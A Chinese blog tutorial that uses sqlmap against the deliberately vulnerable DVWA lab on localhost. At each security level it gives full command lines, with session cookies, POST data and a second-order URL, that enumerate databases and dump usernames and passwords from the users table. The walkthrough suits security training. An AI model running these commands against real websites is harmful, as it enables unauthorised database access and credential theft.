devbox
凡人多烦事01
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

DVWA---SQL注入之Sqlmap_dvwa sqlmap

作者:凡人多烦事01 | 2024-03-19 09:57:29

dvwa sqlmap

目录

一、Sqlmap

1.简介

2.基本步骤

3.命令

二、SQL Injection

1.low

 2.Medium.

 3.high

 4.impossible

一、Sqlmap

1.简介

        Sqlmap是一款自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。

采用五种独特的SQL注入技术,分别是:

  • 基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
  • 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
  • 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
  • 联合查询注入,可以使用union的情况下的注入。
  • 堆查询注入,可以同时执行多条语句的执行时的注入。
     

2.基本步骤

    查看sqlmap相关参数,命令格式为:sqlmap -h
    找到一个可利用的网址,判断网站数据库类型,命令格式为:sqlmap -u
    确定数据库类型为mysql后,查看存在的数据库,命令格式为:sqlmap -u 目标网址–dbs
    查看数据库中存在的表,命令格式为:sqlmap -u 目标网址–tables -D 数据库名
    获取表中的字段,命令格式为:sqlmap -u 目标网址– columns -T 表名 -D 数据库名
    猜解出字段,查看表里的存储内容,命令格式为:sqlmap -u 目标网址– dump -C 字段名称 -T 表名 -D 数据库名

在这之前有几个小知识点

    sqlmap需要我们输入参数,其中最重要的参数是SQL注入的目标地址。首先要判断测试的目标地址是否需要登录,如果需要登录,则将登陆的Cookie作为参数传递给sqlmap。
        python sqlmap.py -u “目标地址” --cookie=“cookie值” --batch
    –batch用来指明自动化操作,否则每一个步骤都需要确认;
    –current-bd查看当前数据库名称
    -D DB 指定要枚举的 DBMS 数据库
    -T TBL 指定要枚举的 DBMS 数据表
    -C COL 指定要枚举的 DBMS 数据列
    -X EXCLUDECOL 指定要排除的 DBMS 数据列
    -U USER 指定枚举的 DBMS 用户

3.命令

  1. sqlmap.py -u "http://xxx//"  --batch
  2.  
  3. sqlmap.py -u "http://xxx//"  --cookie="获取的cookie" 
  4.  
  5. #查询数据库
  6. sqlmap.py -u "http://xxx//"  --cookie="获取的cookie"  -dbs
  7.  
  8. #查看dvwa数据库的表 
  9. sqlmap.py -u "http://xxx//"  --cookie="获取的cookie"  -D data -tables
  10.  
  11. #查看表中的字段名 
  12. sqlmap.py -u "http://xxx//"  --cookie="获取的cookie"  -D data -T users --columns
  13.  
  14. #获取字段的信息
  15. sqlmap.py -u "http://xxx//"  --cookie="获取的cookie"  -D data -T users -C user,password --dump

二、SQL Injection

1.low

我们输入id=1,得到网址 url 

sqlmap进行sql注入,查看信息。 

sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --batch

发现需要登录,在网页获取到cookie。

 查看数据库

sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch -dbs

 

 查看dvwa数据库的表

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch -D dvwa -tables

 查看表中的字段名

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch -D dvwa -T users --columns

 获取字段的信息

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch -D dvwa -T users -C user,password --dump

可以看到用户名和密码已经被我们查询到了。

 2.Medium.

我们输入id=1,url没有反应

 我们利用burpsuit抓包分析, 来查看post方式提交的数据。

这里是使用 post 方式进行传输的,所以我们这里需要使用 --data 参数把数据引入过来

 查看信息

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch

 

查看数据库 

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch -dbs

查看dvwa数据库下的表

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch -D dvwa -tables

查看字段名

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch -D dvwa -T users --columns

 获取字段中的信息

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch -D dvwa -T users -C user,password --dump

 3.high

        我们发现点击之后会在跳到另一个页面,所以这个想使用sqlmap进行爆破,我们还需要引入一个知识点–second-order(二阶sql注入)
        有些时候注入点输入的数据看返回结果的时候并不是当前的页面,而是另外的一个页面,这时候就需要你指定到哪个页面获取响应判断真假。
-–second-order后面跟一个判断页面的URL地址。

利用burpsuite进行抓包,因为这里无法在页面上获取 post 或者 get 的值。

sqlmap>python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="security=high;PHPSESSID=keuqaijadcudeooggiv3ch4gom" --second-url "http://127.0.0.1/dvwa/vulnerabilities/sqli/" --batch

 以下就是和low medium级别 大致相同

获得数据

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="security=high;PHPSESSID=keuqaijadcudeooggiv3ch4gom" --second-url "http://127.0.0.1/dvwa/vulnerabilities/sqli/" --batch -D dvwa -T users -C user,password --dump

 4.impossible

这一级别加入了token验证,我们bp抓包来获取

 sqlmap跑一下,试试,居然成功了。

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=f237dc0df1d6cdf589f09179a99fa7aa#" --cookie="security=impossible;PHPSESSID=keuqaijadcudeooggiv3ch4gom" --batch

 查看一下数据

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=581a16aa4511d8c46a3ea1834973122a#" --cookie="security=impossible;PHPSESSID=0mcqc7ludqslr2se50lsaas3g0" --batch -D dvwa -T users -C user,password --dump

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/凡人多烦事01/article/detail/267483
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号